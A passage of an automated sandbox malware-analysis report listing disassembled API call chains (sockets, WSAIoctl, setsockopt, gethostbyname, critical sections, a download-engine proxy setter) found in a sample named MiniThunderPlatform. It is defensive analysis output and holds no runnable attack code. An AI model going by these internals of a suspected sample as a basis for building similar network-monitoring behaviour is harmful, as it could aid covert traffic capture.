                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@_U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalH_prologLeaveSection
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001589E
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 100155DA: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(10015A7F,?,10015A7F,?,?,?,10015A7F,?,00000000,?,?), ref: 100155F8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 100158E4
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10015910
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@CriticalH_prologSectionV01@@$??$??append@?$basic_string@D@1@@std@@D@2@@0@0@EnterLeaveV12@V12@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10015812
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 100155DA: ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(10015A7F,?,10015A7F,?,?,?,10015A7F,?,00000000,?,?), ref: 100155F8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000), ref: 10015858
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10015881
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@CriticalH_prologSectionV01@@$??$??append@?$basic_string@D@1@@std@@D@2@@0@0@EnterLeaveV12@V12@@V?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 10053F27
                                                                                                                                              • WSACreateEvent.WS2_32 ref: 10053F35
                                                                                                                                              • WSAEventSelect.WS2_32(?,00000000,00000003), ref: 10053F49
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Event$CreateSelectsocket
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 10031B09
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Startup
                                                                                                                                              • String ID:
                                                                                                                                              APIs
                                                                                                                                              • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 1000EF40
                                                                                                                                              • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000000,00000000,00000000), ref: 1000EF80
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: IoctlSocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1409745359-0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10051320: socket.WS2_32(00000002,00000002,00000000), ref: 1005134E
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 1005135C
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error), ref: 1005136D
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051397
                                                                                                                                                • Part of subcall function 10051320: WSAIoctl.WS2_32(?,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 100513D0
                                                                                                                                                • Part of subcall function 10051320: setsockopt.WS2_32(000000FF,0000FFFF,00000020,?,00000001), ref: 100513ED
                                                                                                                                                • Part of subcall function 10051320: WSAGetLastError.WS2_32 ref: 100513F8
                                                                                                                                                • Part of subcall function 10051320: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setsockopt error), ref: 10051409
                                                                                                                                                • Part of subcall function 10051320: _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051433
                                                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 10041273
                                                                                                                                              • setsockopt.WS2_32(00000000,0000FFFF,00000020,?,00000001), ref: 10041295
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@ErrorExceptionIoctlLastThrowU?$char_traits@V?$allocator@setsockopt$socket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 640759157-0
                                                                                                                                              APIs
                                                                                                                                              • _wcsicmp.MSVCR71(?,-StartTP), ref: 0042522C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                              • String ID: -StartTP
                                                                                                                                              • API String ID: 2081463915-117386193
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • Microsoft Unified Security Protocol Provider, xrefs: 10044F38
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast
                                                                                                                                              • String ID: Microsoft Unified Security Protocol Provider
                                                                                                                                              • API String ID: 1452528299-238809041
                                                                                                                                              APIs
                                                                                                                                              • inet_addr.WS2_32(00000000), ref: 101322E7
                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 10132301
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: gethostbynameinet_addr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1594361348-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10017C4A
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10017CA8
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                                • Part of subcall function 100164DE: __EH_prolog.LIBCMT ref: 100164E3
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001650B
                                                                                                                                                • Part of subcall function 100164DE: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001653B
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(product_release_id,?,?,?,7C3869BF), ref: 100165BC
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 100165D2
                                                                                                                                                • Part of subcall function 100164DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000014,00000000,?,?,?,7C3869BF), ref: 100165FE
                                                                                                                                                • Part of subcall function 100164DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,7C3869BF), ref: 1001660E
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016631
                                                                                                                                                • Part of subcall function 100164DE: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016648
                                                                                                                                                • Part of subcall function 100164DE: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,7C3869BF), ref: 10016658
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setting_file_name,?,?,?,7C3869BF), ref: 10016670
                                                                                                                                                • Part of subcall function 100164DE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(env,?,?,?,7C3869BF), ref: 10016681
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@CriticalH_prologSectionV12@V12@@$?append@?$basic_string@?assign@?$basic_string@EnterFileLeaveModuleNamemalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 503490336-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10017D14
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 10017D72
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                                • Part of subcall function 1001F765: __EH_prolog.LIBCMT ref: 1001F76A
                                                                                                                                                • Part of subcall function 1001F765: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000), ref: 1001F78E
                                                                                                                                                • Part of subcall function 1001F765: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 1001F7C3
                                                                                                                                                • Part of subcall function 1001F765: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1001F7CF
                                                                                                                                                • Part of subcall function 1001F765: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001F7E7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CriticalH_prologSection$??0?$basic_string@??1?$basic_string@?assign@?$basic_string@EnterLeaveV01@V12@V12@@Y?$basic_string@malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4081292803-0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001B43B
                                                                                                                                                • Part of subcall function 1000104F: RtlEnterCriticalSection.NTDLL(?), ref: 1000105C
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 1001B485
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalSection$EnterH_prologLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 367238759-0
                                                                                                                                              APIs
                                                                                                                                              • set_hub_proxy.DOWNLOAD_ENGINE(?), ref: 1000542F
                                                                                                                                                • Part of subcall function 10003DFB: memset.MSVCR71(10311348,?,00000314), ref: 10003E24
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 10003E3C
                                                                                                                                                • Part of subcall function 10003DFB: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71(?,10277CA8), ref: 10003E4D
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003E5A
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?,10277CA8), ref: 10003E69
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003E7C
                                                                                                                                                • Part of subcall function 10003DFB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10003E83
                                                                                                                                                • Part of subcall function 10003DFB: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z.MSVCP71(?,10277CA8), ref: 10003E93
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003E9A
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?,10277CA8), ref: 10003EAF
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003EC2
                                                                                                                                                • Part of subcall function 10003DFB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10003EC9
                                                                                                                                                • Part of subcall function 10003DFB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?,10277CA8), ref: 10003EE0
                                                                                                                                                • Part of subcall function 10003DFB: ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 10003EF3
                                                                                                                                                • Part of subcall function 10003DFB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10003EFA
                                                                                                                                                • Part of subcall function 10003DFB: ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 10003F07
                                                                                                                                              • GetTickCount.KERNEL32 ref: 10005434
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6D@std@@@0@V10@V?$basic_ostream@$??0?$basic_string@??1?$basic_string@$??6?$basic_ostream@V01@$??0?$basic_stringstream@?str@?$basic_stringstream@CountD@2@@2@TickV?$basic_string@memsetset_hub_proxy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1016402003-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalDeleteH_prologSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3454226681-0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 10053F10: socket.WS2_32(00000002,00000002,00000000), ref: 10053F27
                                                                                                                                                • Part of subcall function 10053F10: WSACreateEvent.WS2_32 ref: 10053F35
                                                                                                                                                • Part of subcall function 10053F10: WSAEventSelect.WS2_32(?,00000000,00000003), ref: 10053F49
                                                                                                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 10054018
                                                                                                                                              • SetWaitableTimer.KERNEL32 ref: 1005404B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateEventTimerWaitable$Selectsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2683953990-0
                                                                                                                                              APIs
                                                                                                                                              • CreateIoCompletionPort.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 1005082B
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,102444DC,000000FF,10031963,?,00000000), ref: 10050835
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CompletionCreateErrorLastPort
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 826170474-0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1002A560: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002A5BF
                                                                                                                                                • Part of subcall function 10028D20: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10028D64
                                                                                                                                                • Part of subcall function 10028D20: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z.MSVCP71(1027B984), ref: 10028E3E
                                                                                                                                                • Part of subcall function 10028D20: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 10028E70
                                                                                                                                                • Part of subcall function 10028D20: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10028E7D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002A7CC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
